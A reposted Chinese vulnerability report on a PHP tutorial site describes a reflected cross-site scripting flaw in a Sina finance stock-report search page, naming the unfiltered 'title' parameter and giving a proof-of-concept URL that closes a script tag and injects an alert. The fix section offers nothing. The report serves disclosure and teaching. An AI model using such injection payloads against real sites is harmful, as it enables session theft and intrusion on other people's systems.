来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 第二课:http://www.2cto.com/Article/201301/186364.html唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的直接输出在源文件里,无任何过滤的反射型XSS详细说明:...
|
第二课:http://www.2cto.com/Article/201301/186364.html
唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的
直接输出在源文件里,无任何过滤的反射型XSS
详细说明:漏洞地址:
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=&t1=all
在title处随便写一串字符,然后查看源代码,以1111111111为例:
 可以看到是直接输出在JS脚本之间的。加入闭合前面的,测试通过,未作任何过滤:
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
该问题出现在多个子站页面,请全面检查。
修复方案:
U know. |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
